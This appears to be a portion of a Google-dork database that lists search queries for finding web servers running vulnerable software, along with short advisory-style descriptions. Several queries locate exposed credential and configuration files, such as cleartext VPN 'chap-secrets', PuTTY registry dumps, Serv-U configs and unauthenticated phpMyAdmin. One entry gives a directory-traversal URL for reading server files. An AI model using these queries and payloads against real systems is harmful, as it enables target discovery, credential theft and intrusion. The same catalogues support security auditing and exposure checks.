Coppermine Photo Gallery Coppermine Photo Gallery 1.3
Coppermine Photo Gallery Coppermine Photo Gallery 1.3.1
Coppermine Photo Gallery Coppermine Photo Gallery 1.3.2
Coppermine Photo Gallery is reported prone to a design error that may allow users to cast multiple votes for a picture.
All versions of Coppermine Photo Gallery are considered vulnerable at the moment.
http://www.securityfocus.com/bid/11485[descr]]
[[url]http://www.google.com/search?hl=en&q=%22Powered+by+Coppermine+Photo+Gallery%22+&btnG=Google+Search[url]]
[[dork]"Powered by Coppermine Photo Gallery" [dork]]
[end][725]]
[[start][726]
[[title]"Powered by WowBB" -site:wowbb.com[[title]]
[[descr]WowBB is reportedly affected by multiple input validation vulnerabilities. These issues are due to a failure of the application to properly sanitize user-supplied input prior to including it in dynamic web content and SQL database queries.
An attacker can leverage these issues to manipulate or reveal database contents through SQL injection attacks as well as carry out other attacks and steal cookie-based authentication credentials through cross-site scripting attacks.
http://www.securityfocus.com/bid/11429
http://www.wowbb.com/[descr]]
[[url]http://www.google.com/search?hl=en&q=%22Powered+by+WowBB%22+-site%3Awowbb.com+&btnG=Google+Search[url]]
[[dork]"Powered by WowBB" -site:wowbb.com [dork]]
[end][726]]
[[start][727]
[[title]"Powered by ocPortal" -demo -ocportal.com[[title]]
[[descr]Reportedly ocPortal is affected by a remote file include vulnerability. This issue is due to a failure of the application to sanitize user supplied URI input.
An attacker might leverage this issue to run arbitrary server side script code on a vulnerable computer with the privileges of the web server process. This may potentially result in a compromise of the vulnerable computer as well as other attacks.
http://www.securityfocus.com/bid/11368[descr]]
[[url]http://www.google.com/search?hl=en&q=%22Powered+by+ocPortal%22+-demo+-ocportal.com+&btnG=Google+Search[url]]
[[dork]"Powered by ocPortal" -demo -ocportal.com [dork]]
[end][727]]
[[start][728]
[[title]inurl:"slxweb.dll"[title]]
[[descr]SalesLogix is the Customer Relationship Management solution that
drives sales performance in small to medium-sized businesses through Sales, Marketing, and Customer Support automation and back-office integration.
The problem:
By manipulating the cookies used by the Web Client, it is possible to
trick the server into authenticating a remote user as the CRM administrator without requiring a password.
It is also possible to perform SQL injection attacks on the SQL server
that is used as the data store for the SalesLogix CRM system, reveal detailed error reports contained in HTTP headers and disclose the real filesystem paths to various SalesLogix directories.
The SalesLogix server itself is vulnerable to an attack that would
allow a malicious user to obtain the username and password used to access the SQL server used as a data store. The disclosed username and password always have read/write permissions on the database.
Another vulnerability in the SalesLogix server allows an
unauthenticated user to upload arbitrary files to the server in any directory (s)he chooses.
http://www.securityfocus.com/bid/11450[descr]]
[[url]http://www.google.com/search?num=100&hl=en&lr=&safe=off&c2coff=1&q=inurl%3A%22slxweb.dll%22+&btnG=Search[url]]
[[dork]inurl:"slxweb.dll" [dork]]
[end][728]]
[[start][729]
[[title]"Powered by DMXReady Site Chassis Manager" -site:dmxready.com[[title]]
[[descr]It is reported that DMXReady Site Chassis Manager is susceptible to two remotely exploitable input validation vulnerabilities. These vulnerabilities are due to a failure of the application to properly sanitize user-supplied data.
The first issue is an unspecified cross-site scripting vulnerability. This issue could permit a remote attacker to create a malicious URI link that includes hostile HTML and script code. If this link were to be followed, the hostile code may be rendered in the web browser of the victim user. This would occur in the security context of the affected web site and may allow for theft of cookie-based authentication credentials or other attacks.
The second issue is an unspecified SQL injection vulnerability. It may be possible for a remote user to inject arbitrary SQL queries into the underlying database used by the application. This could permit remote attackers to pass malicious input to database queries, resulting in modification of query logic or other attacks.
Successful exploitation could result in compromise of the application, disclosure or modification of data or may permit an attacker to exploit vulnerabilities in the underlying database implementation.[descr]]
[[url]http://www.google.com/search?hl=en&q=%22Powered+by+DMXReady+Site+Chassis+Manager%22+-site%3Admxready.com&btnG=Google+Search[url]]
[[dork]"Powered by DMXReady Site Chassis Manager" -site:dmxready.com[dork]]
[end][729]]
[[start][730]
[[title]"Powered by My Blog" intext:"FuzzyMonkey.org"[title]]
[[descr]FuzzyMonkey My Blog is vulnerable to multiple input validation vulnerabilities. These issues are caused by a failure to validate and filter user-supplied strings before including them in dynamic Web page content.
An attacker could leverage these issues to carry out cross-site scripting attacks against unsuspecting users, facilitating theft of cookie-based authentication credentials as well as other attacks.
vulnerable FuzzyMonkey My Blog 1.15
FuzzyMonkey My Blog 1.16
FuzzyMonkey My Blog 1.17
FuzzyMonkey My Blog 1.18
FuzzyMonkey My Blog 1.19
FuzzyMonkey My Blog 1.20
not vulnerable FuzzyMonkey My Blog 1.21
They also have several other scripts, which may or may not be vulnerable. But remember Murphy's law also applies to software writers.
# My Photo Gallery (picture and file sharing software)
# My Calendar (quick and easy web calendar)
# My Voting Script
# My Guestbook
http://www.securityfocus.com/bid/11325[descr]]
[[url]http://www.google.com/search?num=100&hl=en&lr=&safe=off&c2coff=1&q=%22Powered+by+My+Blog%22+intext%3A%22FuzzyMonkey.org%22&btnG=Search[url]]
[[dork]"Powered by My Blog" intext:"FuzzyMonkey.org"[dork]]
[end][730]]
[[start][731]
[[title]inurl:wiki/MediaWiki[[title]]
[[descr]MediaWiki is reported prone to a cross-site scripting vulnerability. This issue arises due to insufficient sanitization of user-supplied data. A remote attacker may exploit this vulnerability to execute arbitrary HTML and script code in the browser of a vulnerable user.
bugtraq id 11480
object
class Input Validation Error
cve CVE-MAP-NOMATCH
remote Yes
local No
published Oct 18, 2004
updated Oct 20, 2004
vulnerable MediaWiki MediaWiki 1.3
MediaWiki MediaWiki 1.3.1
MediaWiki MediaWiki 1.3.2
MediaWiki MediaWiki 1.3.3
MediaWiki MediaWiki 1.3.4
MediaWiki MediaWiki 1.3.5
MediaWiki MediaWiki 1.3.6
not vulnerable MediaWiki MediaWiki 1.3.7
[descr]]
[[url]http://www.google.com/search?num=100&hl=en&lr=&safe=off&c2coff=1&q=inurl%3Awiki%2FMediaWiki&btnG=Search[url]]
[[dork]inurl:wiki/MediaWiki[dork]]
[end][731]]
[[start][732]
[[title]"inurl:/site/articles.asp?idcategory="[title]]
[[descr]Dwc_Articles, is an ASP application designed to add Featured, Recent and Popular News through an easy to use administration area. Other features: Design Packages, Add, Modify, Deactive through HTML/Wysiwyg Editor, Upload, categories, Multiple Users and more.
Nearly all scripts suffer from possible sql injections. This may lead an attacker to change websites content or even worse, a login as an admin.
vulnerable: <= 1.6 are vulnerable (others not yet confirmed)
Status: No email address or phone number known, so vendor could not be contacted.
author: l0om (http://www.excluded.org)
vendor: www.distinctwebcreations.com
Possible workaround: remove or rename the admin scripts.
[descr]]
[[url]http://www.google.com/search?hl=en&q=%22inurl%3A%2Fsite%2Farticles.asp%3Fidcategory%3D%22+&btnG=Google+Search[url]]
[[dork]"inurl:/site/articles.asp?idcategory=" [dork]]
[end][732]]
[[start][733]
[[title]"Enter ip" inurl:"php-ping.php"[title]]
[[descr]It has been reported that php-ping may be prone to a remote command execution vulnerability that may allow remote attackers to execute commands on vulnerable systems. The problem exists due to insufficient sanitization of shell
metacharacters via the 'count' parameter of php-ping.php script.
report: http://www.securityfocus.com/bid/9309/info/
sample: http://img64.exs.cx/my.php?loc=img64&image=phpping.jpg
[descr]]
[[url]http://www.google.com/search?hl=en&lr=&c2coff=1&client=firefox-a&q=%22Enter+ip%22+inurl%3A%22php-ping.php%22&btnG=Search[url]]
[[dork]"Enter ip" inurl:"php-ping.php"[dork]]
[end][733]]
[[start][734]
[[title]"File Upload Manager v1.3" "rename to"[title]]
[[descr]thepeak file upload manager let you manage your webtree with up and downloading files.[descr]]
[[url]http://www.google.com/search?hl=en&lr=&ie=ISO-8859-1&q=%22File+Upload+Manager+v1.3%22+%22rename+to%22&btnG=Search[url]]
[[dork]"File Upload Manager v1.3" "rename to"[dork]]
[end][734]]
[[start][735]
[[title]inurl:click.php intext:PHPClickLog
[[title]]
[[descr] A script written in PHP 4 which logs a user's statistics when they click on a link.
The log is stored in a flatfile (text) database and can be viewed/inspected through an administration section.[descr]]
[[url]http://www.google.com/search?hl=en&lr=&ie=ISO-8859-1&q=inurl%3Aclick.php+intext%3APHPClickLog+%0D%0A&btnG=Search[url]]
[[dork]inurl:click.php intext:PHPClickLog
[dork]]
[end][735]]
[[start][736]
[[title]intitle:welcome.to.horde[[title]]
[[descr]Horde Mail is web based email software, great for checking messages on the road. Several vulnerabilities were reported to Security Focus.[descr]]
[[url]http://www.google.com/search?q=intitle:welcome.to.horde&hl=en&lr=&filter=0[url]]
[[dork]intitle:welcome.to.horde[dork]]
[end][736]]
[[start][737]
[[title]"BlackBoard 1.5.1-f | © 2003-4 by Yves Goergen"[title]]
[[descr]bugtraq id 11336
object
class Input Validation Error
cve CVE-MAP-NOMATCH
remote Yes
local No
published Oct 06, 2004
updated Oct 06, 2004
vulnerable BlackBoard Internet Newsboard System BlackBoard Internet Newsboard System 1.5.1
BlackBoard Internet Newsboard System is reported prone to a remote file include vulnerability. This issue presents itself because the application fails to sanitize user-supplied data properly. This issue may allow an attacker to include malicious files containing arbitrary script code to be executed on a vulnerable computer.
BlackBoard Internet Newsboard System version 1.5.1 is reported prone to this vulnerability. It is possible that prior versions are affected as well.[descr]]
[[url]http://www.google.com/search?q=%22BlackBoard+1.5.1-f+%7C+%C2%A9+2003-4+by+Yves+Goergen%22&hl=en&lr=&filter=0[url]]
[[dork]"BlackBoard 1.5.1-f | © 2003-4 by Yves Goergen"[dork]]
[end][737]]
[[start][740]
[[title]inurl:explorer.cfm inurl:(dirpath|This_Directory)[[title]]
[[descr]Filemanager without authentication. [descr]]
[[url]http://www.google.com/search?hl=en&lr=&c2coff=1&client=firefox-a&q=inurl%3Aexplorer.cfm+inurl%3A%28dirpath%7CThis_Directory%29&btnG=Search[url]]
[[dork]inurl:explorer.cfm inurl:(dirpath|This_Directory)[dork]]
[end][740]]
[[start][741]
[[title]filetype:php inurl:wiki (inurl:"SystemInfo" | inurl:FindPage| inurl:HelpContents| inurl:RecentChanges)[[title]]
[[descr]MoniWiki MoniWiki 1.0.8
It is reported that MoniWiki is susceptible to a cross-site scripting vulnerability. This issue is due to a failure of the application to properly sanitize user-supplied URI input prior to including it in dynamic web page content.
This issue could permit a remote attacker to create a malicious URI link that includes hostile HTML and script code. If this link were to be followed, the hostile code may be rendered in the web browser of the victim user. This would occur in the security context of the affected web site and may allow for theft of cookie-based authentication credentials or other attacks.
An attacker could also search for:
1. "powerd by MoniWiki"
2. intitle:"system.info" "MoniWiki" [descr]]
[[url]http://www.google.com/search?hl=en&q=filetype%3Aphp+inurl%3Awiki+%28inurl%3A%22SystemInfo%22+%7C+inurl%3AFindPage%7C+inurl%3AHelpContents%7C+inurl%3ARecentChanges%29+&btnG=Google+Search[url]]
[[dork]filetype:php inurl:wiki (inurl:"SystemInfo" | inurl:FindPage| inurl:HelpContents| inurl:RecentChanges) [dork]]
[end][741]]
[[start][742]
[[title]intitle:"AppServ Open Project" -site:www.appservnetwork.com[[title]]
[[descr]AppServ is the Apache/PHP/MySQL open source software installer packages. This normally includes convenient links to phpMyAdmin and phpInfo() pages.[descr]]
[[url]http://www.google.com/search?hl=en&lr=&c2coff=1&client=firefox-a&q=intitle%3A%22AppServ+Open+Project%22+-site%3Awww.appservnetwork.com&btnG=Search[url]]
[[dork]intitle:"AppServ Open Project" -site:www.appservnetwork.com[dork]]
[end][742]]
[[start][743]
[[title]"powered by YellDL"[title]]
[[descr]Finds websites using YellDL (or also known as YellDownLoad), a download tracker written in PHP. Unfortunately this downloader downloads everything you want to, like its own files too:
http://xxxxxxxxxx/download.php?f=../download&e=php
By guessing some could download information which shoudln't get out of the server (think of ../phpMyAdmin/config.php or other stuff - no need to say that lazy people use same passwords for their DB- and FTP-login.
Another search to find this software is:
"You are downloading *" "you are downloader number * of this file" [descr]]
[[url]http://www.google.com/[url]]
[[dork][dork]]
[end][743]]
[[start][744]
[[title]intitle:"index of" intext:"content.ie5"[title]]
[[descr]This dork indicates the "Local settings" dir in most cases, and browseble server directories in general.[descr]]
[[url]http://www.google.com/search?sourceid=navclient&ie=UTF-8&q=intitle%3A%22index+of%22+intext%3A%22content%2Eie5%22[url]]
[[dork]intitle:"index of" intext:"content.ie5"[dork]]
[end][744]]
[[start][745]
[[title]intitle:"php icalendar administration" -site:sourceforge.net[[title]]
[[descr]PHP iCalendar is a php-based iCal file parser. Its based on v2.0 of the IETF spec. It displays iCal files in a nice logical, clean manner with day, week, month, and year navigation.
This reveals the administration interface.[descr]]
[[url]http://www.google.com/search?q=intitle%3A%22php+icalendar+administration%22+-site%3Asourceforge.net[url]]
[[dork]intitle:"php icalendar administration" -site:sourceforge.net[dork]]
[end][745]]
[[start][746]
[[title]intitle:"Web Server Statistics for ****"[title]]
[[descr]These are www analog webstat reports. The failure report shows information leakage about database drivers, admin login pages, SQL statements, etc.[descr]]
[[url]http://www.google.com/search?num=100&hl=en&lr=&safe=off&c2coff=1&q=intitle%3A%22Web+Server+Statistics+for+****%22&btnG=Search[url]]
[[dork]intitle:"Web Server Statistics for ****"[dork]]
[end][746]]
[[start][747]
[[title]filetype:php inurl:index inurl:phpicalendar -site:sourceforge.net[[title]]
[[descr]PHP iCalendar is a php-based iCal file parser. Its based on v2.0 of the IETF spec. It displays iCal files in a nice logical, clean manner with day, week, month, and year navigation
This reveals the RSS info for the user calendars. [descr]]
[[url]http://www.google.com/search?num=100&&q=filetype%3Aphp+inurl%3Aindex+inurl%3Aphpicalendar+-site%3Asourceforge.net[url]]
[[dork]filetype:php inurl:index inurl:phpicalendar -site:sourceforge.net[dork]]
[end][747]]
[[start][749]
[[title]intitle:"php icalendar administration" -site:sourceforge.net[[title]]
[[descr]This is the adminstration login portal search for PHP iCalendar. It is compatible with Evolution and clients for other platforms. Admin uuthentication has two choices, FTP and Internal. For the latter the defaults are "admin/admin".
There is also a more generic search in the GHDB that an attacker use and then modify to ../admin.php to reach the adminstration pages. Access to adminstration allows an attacker to upload new ICS files or delete present ones.[descr]]
[[url]http://www.google.com/search?q=intitle%3A%22php+icalendar+administration%22+-site%3Asourceforge.net[url]]
[[dork]intitle:"php icalendar administration" -site:sourceforge.net[dork]]
[end][749]]
[[start][750]
[[title]intitle:phpMyAdmin "Welcome to phpMyAdmin ***" "running on * as root@*"[title]]
[[descr]phpMyAdmin is a tool written in PHP intended to handle the administration of MySQL over the Web. Currently it can create and drop databases, create/drop/alter tables, delete/edit/add fields
The servers found here can be acessed without authentication. This search is restricted to NON-ROOT users! See ID 510 for a root user search. [descr]]
[[url]http://www.google.com/search?q=intitle%3AphpMyAdmin+%22Welcome+to+phpMyAdmin+***%22+%22running+on+*+as+root%40*%22&start=0[url]]
[[dork]intitle:phpMyAdmin "Welcome to phpMyAdmin ***" "running on * as root@*"[dork]]
[end][750]]
[[start][751]
[[title]"please visit" intitle:"i-Catcher Console" Copyright "iCode Systems"[title]]
[[descr]CCTV webcams by ICode.[descr]]
[[url]http://www.google.com/[url]]
[[dork][dork]]
[end][751]]
[[start][752]
[[title]inurl:irc filetype:cgi cgi:irc[[title]]
[[descr]CGIIRC is a web-based IRC client. Using a non-transparent proxy an attacker could communicate anonymously by sending direct messages to a contact. Most servers are restricted to one irc server and one or more default channels and will not let allow access to anything else.[descr]]
[[url]http://www.google.com/search?num=100&q=inurl%3Airc+filetype%3Acgi+cgi%3Airc[url]]
[[dork]inurl:irc filetype:cgi cgi:irc[dork]]
[end][752]]
[[start][753]
[[title]natterchat inurl:home.asp -site:natterchat.co.uk[[title]]
[[descr]NatterChat is a webbased chat system written in ASP.
An SQL injection vulnerability is identified in the application that may allow attackers to pass malicious input to database queries, resulting in the modification of query logic or other attacks. This allows the attacker to gain admin access... [descr]]
[[url]http://www.google.com/search?hl=en&lr=&c2coff=1&client=firefox-a&q=natterchat+inurl%3Ahome.asp+-site%3Anatterchat.co.uk+&btnG=Search[url]]
[[dork]natterchat inurl:home.asp -site:natterchat.co.uk [dork]]
[end][753]]
[[start][754]
[[title]filetype:inf inurl:capolicy.inf[[title]]
[[descr]The CAPolicy.inf file provides Certificate Servicces configuration information, which is read during initial CA installation an whenever you renew a CA certificate. The CApolicy.inf file defines settings specific to root CAs, as well as settings that affect all CAs in the CA hierarchiy.[descr]]
[[url]http://www.google.com/search?q=filetype%3Ainf+inurl%3Acapolicy.inf&start=0&start=0&ie=utf-8&oe=utf-8&client=firefox&rls=org.mozilla:en-US:official[url]]
[[dork]filetype:inf inurl:capolicy.inf[dork]]
[end][754]]
[[start][755]
[[title]"Certificate Practice Statement" inurl:(PDF | DOC)[[title]]
[[descr]Certificate Practice Statement (CPS)
A CPS defines the measures taken to secure CA operation and the management of CA-issued certificates. You can consider a CPS to be an agreement between the organization managing the CA and the people relying on on the certificates issued by the CA.[descr]]
[[url]http://www.google.com/search?hl=en&lr=&safe=off&q=%22Certificate+Practice+Statement%22+inurl%3A%28PDF+%7C+DOC%29&btnG=Search[url]]
[[dork]"Certificate Practice Statement" inurl:(PDF | DOC)[dork]]
[end][755]]
[[start][757]
[[title]filetype:cgi inurl:cachemgr.cgi[[title]]
[[descr]cachemgr.cgi is a management interface for the Squid proxy service. It was installed by default in /cgi-bin by RedHat Linux 5.2 and 6.0 installed with Squid. This script prompts for a host and port which it then attempts to connect to. If a web server, such as apache, is running this can be used to connect to arbitrary hosts and ports, allowing for potential use as an intermediary in denial of service attacks, proxied port scans, etc. Interpreting the output of the script can allow the attacker to determine whether or not a connection was established. [descr]]
[[url]http://www.google.com/search?hl=en&q=filetype%3Acgi+inurl%3Acachemgr.cgi[url]]
[[dork]filetype:cgi inurl:cachemgr.cgi[dork]]
[end][757]]
[[start][758]
[[title]inurl:chap-secrets -cvs[[title]]
[[descr]linux vpns store their usernames and passwords for CHAP authentification in a file called "chap-secrets" where the usernames and the passwords are in cleartext.
[descr]]
[[url]http://www.google.com/search?hl=en&q=inurl%3Achap-secrets+-cvs+&btnG=Suche&meta=[url]]
[[dork]inurl:chap-secrets -cvs [dork]]
[end][758]]
[[start][759]
[[title]inurl:pap-secrets -cvs[[title]]
[[descr]linux vpns store there usernames and passwords for PAP authentification in a file called "pap-secrets" where the usernames and the passwords are in cleartext.
[descr]]
[[url]http://www.google.com/search?hl=en&lr=&q=inurl%3Apap-secrets+-cvs+&btnG=Search[url]]
[[dork]inurl:pap-secrets -cvs [dork]]
[end][759]]
[[start][760]
[[title]filetype:ini inurl:"serv-u.ini"[title]]
[[descr]Serv-U is a ftp/administration server for Windows. This file leaks info about the version, username and password. Passwords are in encrypted, but there is a decryption program available on the Net. An attacker could use this search to upload dangerous code etc.[descr]]
[[url]http://www.google.com/search?&q=filetype%3Aini+inurl%3A%22serv-u.ini%22[url]]
[[dork]filetype:ini inurl:"serv-u.ini"[dork]]
[end][760]]
[[start][761]
[[title]inurl:"forumdisplay.php" +"Powered by: vBulletin Version 3.0.0..4"[title]]
[[descr]vBulletin is reported vulnerable to a remote SQL injection vulnerability. This issue is due to a failure of the application to properly validate user-supplied input prior to including it in an SQL query.
An attacker may exploit this issue to manipulate and inject SQL queries onto the underlying database. It will be possible to leverage this issue to steal database contents including administrator password hashes and user credentials as well as to make attacks against the underlying database.
Versions 3.0 through to 3.0.3 are reportedly affected by this issue.
http://www.securityfocus.com/bid/11193
[descr]]
[[url]http://www.google.com/search?q=inurl:%22forumdisplay.php%22+%2B%22Powered+by:+vBulletin+Version+3.0.0..4%22+&hl=en&lr=&c2coff=1&client=firefox-a&rls=org.mozilla:en-US:official&start=80&sa=N[url]]
[[dork]inurl:"forumdisplay.php" +"Powered by: vBulletin Version 3.0.0..4" [dork]]
[end][761]]
[[start][762]
[[title]WebControl intitle:"AMX NetLinx"[title]]
[[descr]AMX Netlink is a server appliance which connects various devices like a beamer, laptop or video recorder to the internet.[descr]]
[[url]http://www.google.com/search?q=WebControl+intitle%3A%22AMX+NetLinx%22&btnG=Search&hl=en&lr=&c2coff=1&client=firefox[url]]
[[dork]WebControl intitle:"AMX NetLinx"[dork]]
[end][762]]
[[start][763]
[[title]inurl:ConnectComputer/precheck.htm | inurl:Remote/logon.aspx[[title]]
[[descr]Windows Small Business Server 2003: The network configuration page is called "ConnectComputer/precheck.htm " and the Remote Web login page is called "remote/logon.aspx".[descr]]
[[url]http://www.google.com/search?q=inurl%3AConnectComputer%2Fprecheck.htm+%7C+inurl%3ARemote%2Flogon.aspx[url]]
[[dork]inurl:ConnectComputer/precheck.htm | inurl:Remote/logon.aspx[dork]]
[end][763]]
[[start][764]
[[title]inurl:aol*/_do/rss_popup?blogID=[[title]]
[[descr]AOL Journals BlogID Incrementing Discloses Account Names and Email Addresses
AOL Journals is basically "America Online's version of a blog (weblog) for AOL members/subscribers. A vulnerability in AOL Journals BlogID allows an attacker to numbers provided to the program and enumerate a list of AOL members/subscribers and their corresponding email.
[descr]]
[[url]http://www.google.com/search?hl=en&lr=&c2coff=1&q=inurl%3Aaol*%2F_do%2Frss_popup%3FblogID%3D&btnG=Search[url]]
[[dork]inurl:aol*/_do/rss_popup?blogID=[dork]]
[end][764]]
[[start][765]
[[title](inurl:/shop.cgi/page=) | (inurl:/shop.pl/page=)[[title]]
[[descr]This is a "double dork" finds two different shopping carts, both vulnerable
1) Cyber-Village Online Consulting Shopping Cart
Cyber-Village's script is known to not sanitize the user input properly which leads to code execution problems.
2) Hassan Consulting's Shopping Cart
For Hassan's cart it is reported that a remote user can request the 'shop.cfg' and that the script allows directory traversal.
[descr]]
[[url]http://www.google.com/search?hl=en&lr=&c2coff=1&client=firefox-a&q=%28inurl%3A%2Fshop.cgi%2Fpage%3D%29+%7C+%28inurl%3A%2Fshop.pl%2Fpage%3D%29&btnG=Search[url]]
[[dork](inurl:/shop.cgi/page=) | (inurl:/shop.pl/page=)[dork]]
[end][765]]
[[start][766]
[[title]inurl:newsdesk.cgi? inurl:"t="[title]]
[[descr]Newsdesk is a cgi script designed to allow remote administration of website news headlines.
Due to a failure in the sanitization of parameters a remote user can reveal the contents of any file. This allows the attacker to download user and password data.
It is furthermore known that it is possible to run system commands remotely.
[descr]]
[[url]http://www.google.com/search?q=inurl:newsdesk.cgi%3F+inurl:%22t%3D%22&hl=en&lr=&ie=UTF-8&c2coff=1&client=firefox-a&start=10&sa=N[url]]
[[dork]inurl:newsdesk.cgi? inurl:"t="[dork]]
[end][766]]
[[start][767]
[[title]"Switch to table format" inurl:table|plain[[title]]
[[descr]This is an index page of OReilly WebSite Professional.
WebsitePro was developed by O'reily and disconinued on August 2001. The product was then continued by Deerfield.com
[descr]]
[[url]http://www.google.com/search?hl=en&lr=&c2coff=1&client=firefox-a&q=%22Switch+to+table+format%22+inurl%3Atable%7Cplain&btnG=Search[url]]
[[dork]"Switch to table format" inurl:table|plain[dork]]
[end][767]]
[[start][768]
[[title]intitle:"Home" "Xerox Corporation" "Refresh Status"[title]]
[[descr]CentreWare Internet Services is an interactive service that uses Internet technology to extend the capabilities of your DocuPrint printer using Internet technology. An HTTP server application developed by Xerox is resident on your network-enabled DocuPrint printer. This HTTP server provides access to advanced services for the installation, configuration, and management of your DocuPrint printer. [descr]]
[[url]http://www.google.com/search?hl=en&lr=&c2coff=1&client=firefox-a&q=intitle%3A%22Home%22+%22Xerox+Corporation%22+%22Refresh+Status%22&btnG=Search[url]]
[[dork]intitle:"Home" "Xerox Corporation" "Refresh Status"[dork]]
[end][768]]
[[start][769]
[[title]inurl:webutil.pl[[title]]
[[descr]webutil.pl is a web interface to the following services:
* ping
* traceroute
* whois
* finger
* nslookup
* host
* dnsquery
* dig
* calendar
* uptime [descr]]
[[url]http://www.google.com/search?hl=en&lr=&c2coff=1&client=firefox-a&q=inurl%3Awebutil.pl&btnG=Search[url]]
[[dork]inurl:webutil.pl[dork]]
[end][769]]
[[start][770]
[[title]"About Mac OS Personal Web Sharing"[title]]
[[descr]Mac OS Personal Web Sharing allows Mac OS users to share Folders over the Web.
If you open this page you will shown the system's major version as requirement.[descr]]
[[url]http://www.google.com/search?q=%22About+Mac+OS+Personal+Web+Sharing%22&hl=en&lr=&c2coff=1&client=firefox-a&filter=0[url]]
[[dork]"About Mac OS Personal Web Sharing"[dork]]
[end][770]]
[[start][771]
[[title]ext:conf NoCatAuth -cvs[[title]]
[[descr]NoCatAuth configuration file. This reveals the configuration details of wirless gateway including ip addresses, device names and pathes.[descr]]
[[url]http://www.google.com/search?q=ext:conf+NoCatAuth+-cvs&hl=en&lr=&filter=0[url]]
[[dork]ext:conf NoCatAuth -cvs[dork]]
[end][771]]
[[start][772]
[[title]inurl:"putty.reg"[title]]
[[descr]This registry dump contains putty saved session data. SSH servers the according usernames and proxy configurations are stored here.
[descr]]
[[url]http://www.google.com/search?q=inurl%3A%22putty.reg%22&start=0&start=0&ie=utf-8&oe=utf-8&client=firefox-a&rls=org.mozilla:en-US:official[url]]
[[dork]inurl:"putty.reg"[dork]]
[end][772]]
[[start][773]
[[title]intitle:"Icecast Administration Admin Page"[title]]
[[descr]Icecast streaming audio server web admin.
This gives you a list of connected clients. Interesting way of finding attackable client computers.
[descr]]
[[url]http://www.google.com/search?hl=en&lr=&c2coff=1&client=firefox-a&q=intitle%3A%22Icecast+Administration+Admin+Page%22&btnG=Search[url]]
[[dork]intitle:"Icecast Administration Admin Page"[dork]]
[end][773]]
[[start][774]
[[title]inurl:/adm-cfgedit.php[[title]]
[[descr]PhotoPost Pro is photo gallery system. This dork finds its installation page.
You can use this page to set all parameters of the system.
The existing data is not shown :([descr]]
[[url]http://www.google.com/search?q=inurl%3A%2Fadm-cfgedit.php+&start=0&start=0&ie=utf-8&oe=utf-8&client=firefox-a&rls=org.mozilla:en-US:official[url]]
[[dork]inurl:/adm-cfgedit.php [dork]]
[end][774]]
[[start][775]
[[title]"liveice configuration file" ext:cfg -site:sourceforge.net[[title]]
[[descr]This finds the liveice.cfg file which contains all configuration data for an Icecast server. Passwords are saved unencrypted in this file.[descr]]
[[url]http://www.google.com/search?q=%22liveice+configuration+file%22+ext:cfg+-site:sourceforge.net&hl=en&lr=&c2coff=1&filter=0[url]]
[[dork]"liveice configuration file" ext:cfg -site:sourceforge.net[dork]]
[end][775]]
[[start][776]
[[title]inurl:portscan.php "from Port"|"Port Range"[title]]
[[descr]This is general search for online port scanners which accept any IP. It does not find a specific scanner script, but searches for a pattern which will match some more scanners.
[descr]]
[[url]http://www.google.com/search?q=inurl:portscan.php+%22from+Port%22%7C%22Port+Range%22&num=100&hl=en&lr=&ie=UTF-8&c2coff=1&safe=off&client=firefox-a&rls=org.mozilla:en-US:official&filter=0[url]]
[[dork]inurl:portscan.php "from Port"|"Port Range"[dork]]
[end][776]]
[[start][777]
[[title]intitle:"sysinfo * " intext:"Generated by Sysinfo * written by The Gamblers."[title]]
[[descr]Lots of information leakage on these pages about active network services, server info, network connections, etc..[descr]]
[[url]http://www.google.com/search?num=100&hl=en&lr=&ie=ISO-8859-1&safe=off&c2coff=1&q=++intitle%3A%22sysinfo+*+%22+intext%3A%22Generated+by+Sysinfo+*+written+by+The+Gamblers.%22+&btnG=Search[url]]
[[dork] intitle:"sysinfo * " intext:"Generated by Sysinfo * written by The Gamblers." [dork]]
[end][777]]
[[start][778]
[[title]filetype:pst pst -from -to -date[[title]]
[[descr]Finds Outlook PST files which can contain emails, calendaring and address information.[descr]]
[[url]http://www.google.com/search?hl=en&lr=&q=filetype%3Apst+pst+-from+-to+-date&btnG=Search[url]]
[[dork]filetype:pst pst -from -to -date[dork]]
[end][778]]
[[start][779]
[[title]intitle:Configuration.File inurl:softcart.exe[[title]]
[[descr]This search finds configuration file errors within the softcart application. It includes the name of the configuration file and discloses server file paths.[descr]]
[[url]http://www.google.com/search?hl=en&q=intitle%3AConfiguration.File+inurl%3Asoftcart.exe&btnG=Google+Search[url]]
[[dork]intitle:Configuration.File inurl:softcart.exe[dork]]
[end][779]]
[[start][780]
[[title]inurl:technote inurl:main.cgi*filename=*[[title]]
[[descr]http://www.securityfocus.com/bid/2156/discussion/
Remote command execution vulnerability in the filename parameter.[descr]]
[[url]http://www.google.com/search?hl=en&ie=ISO-8859-1&q=inurl%3Atechnote+inurl%3Amain.cgi*filename%3D*+&btnG=Google+Search[url]]
[[dork]inurl:technote inurl:main.cgi*filename=* [dork]]
[end][780]]
[[start][781]
[[title]intext:"Ready with 10/100T Ethernet"[title]]
[[descr]Xerox 860 and 8200 Printers.[descr]]
[[url]http://www.google.com/search?q=intext:%22Ready+with+10/100T+Ethernet%22&hl=en&lr=&c2coff=1&filter=0[url]]
[[dork]intext:"Ready with 10/100T Ethernet"[dork]]
[end][781]]
[[start][782]
[[title]intext:"UAA (MSB)" Lexmark -ext:pdf[[title]]
[[descr]Lexmark printers (T620, T522, Optra T614, E323, T622, Optra T610, Optra T616, T520 and Optra S 1855)[descr]]
[[url]http://www.google.com/search?q=intext%3A%22UAA+%28MSB%29%22++Lexmark+-ext%3Apdf[url]]
[[dork]intext:"UAA (MSB)" Lexmark -ext:pdf[dork]]
[end][782]]
[[start][783]
[[title]intitle:"Welcome to Your New Home Page!" "by the Debian release"[title]]
[[descr]This finds the default Apache page on Debian installs.[descr]]
[[url]http://www.google.com/search?num=100&q=intitle%3A%22Welcome+to+Your+New+Home+Page%21%22+%22by+the+Debian+release%22[url]]
[[dork]intitle:"Welcome to Your New Home Page!" "by the Debian release"[dork]]
[end][783]]
[[start][785]
[[title]"intitle:Index.Of /" stats merchant cgi-* etc[[title]]
[[descr]This search looks for indexes with the following subdirectories: stats, merchant, online-store and cgi-local or cgi-bin. These servers have a shopping cart application called softcart in their cgi-local or cgi-bin directory.
Reportedly, it is possible to execute arbitrary code by passing a malformed CGI parameter in an HTTP GET request. This issue is known to affect SoftCart version 4.00b. [descr]]
[[url]http://www.google.com/search?q=%22intitle%3AIndex.Of+%2F%22+stats+merchant+cgi-*+etc[url]]
[[dork]"intitle:Index.Of /" stats merchant cgi-* etc[dork]]
[end][785]]
[[start][788]
